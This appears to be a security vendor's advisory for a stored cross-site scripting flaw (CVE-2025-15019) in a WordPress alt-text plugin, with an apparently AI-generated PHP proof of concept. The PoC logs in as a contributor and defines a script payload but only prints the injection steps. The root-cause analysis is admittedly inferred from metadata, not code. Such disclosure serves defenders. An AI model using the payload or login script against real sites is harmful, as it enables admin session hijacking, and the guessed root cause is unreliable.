Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-15019: BIALTY – Bulk Image Alt Text (Alt tag, Alt Attribute) with Yoast SEO + WooCommerce <= 2.2.1 – Authenticated (Contributor+) Stored Cross-Site Scripting (bulk-image-alt-text-with-yoast)

CVE ID CVE-2025-15019
Plugin bulk-image-alt-text-with-yoast
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 2.2.1
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15019 (metadata-based):
The BIALTY WordPress plugin contains an authenticated stored cross-site scripting vulnerability in versions up to 2.2.1. Attackers with contributor-level privileges or higher can inject malicious scripts via the ‘bialty_cs_alt’ post meta field. These scripts execute when administrators view affected posts in the editor interface.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping. The plugin likely stores user-supplied data in post meta without proper validation. The CWE-79 classification confirms improper neutralization of input during web page generation. This analysis infers the vulnerability exists in the post meta handling code, though no source code diff is available for confirmation.

Exploitation requires authenticated access with contributor privileges. Attackers would edit or create a post, then inject a malicious payload into the ‘bialty_cs_alt’ field. The plugin’s AJAX handler or post meta update function processes this unsanitized input. A typical payload might be `alert(document.domain)`. The script executes in the administrator’s browser when they access the post editor, potentially allowing session hijacking or administrative actions.

Remediation requires implementing proper input sanitization and output escaping. The patch likely adds `sanitize_text_field()` or similar WordPress sanitization functions when processing the ‘bialty_cs_alt’ parameter. Output escaping functions like `esc_attr()` or `esc_html()` should be applied when displaying the stored value. WordPress capability checks should remain in place to maintain the authenticated requirement.

Successful exploitation enables attackers to execute arbitrary JavaScript in administrator sessions. This can lead to administrative account compromise, site defacement, or data theft. The stored nature means the payload persists across sessions. Attackers could create backdoors, modify site content, or redirect users to malicious sites. The CVSS score of 6.4 reflects medium severity with scope change and confidentiality impacts.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15019 - BIALTY - Bulk Image Alt Text (Alt tag, Alt Attribute) with Yoast SEO + WooCommerce <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-15019
 * Assumptions based on vulnerability description:
 * 1. The plugin uses 'bialty_cs_alt' as a post meta key
 * 2. Contributor+ users can modify this field
 * 3. No sanitization occurs before storage
 * 4. The payload executes in admin post editor
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS - requires contributor role
$password = 'contributor_pass'; // CHANGE THIS

// XSS payload - executes when admin views post editor
$payload = '<script>alert(`Atomic Edge Research - XSS via bialty_cs_alt: ${document.domain}`)</script>';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ])
]);

$response = curl_exec($ch);

// Check login success by accessing admin dashboard
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Create a new post to inject the payload
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
$response = curl_exec($ch);

// Extract nonce from the post creation form (simplified - real implementation needs parsing)
// This PoC assumes the plugin uses standard WordPress post meta update mechanisms
// In practice, you would need to extract the correct nonce and post ID

// For demonstration, we show the attack vector structure:
echo "Exploit requires:";
echo "1. Contributor access to create/edit postsn";
echo "2. Injection into 'bialty_cs_alt' post meta fieldn";
echo "3. Payload: " . htmlspecialchars($payload) . "n";
echo "4. Execution when admin views post editorn";

// Cleanup
curl_close($ch);
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School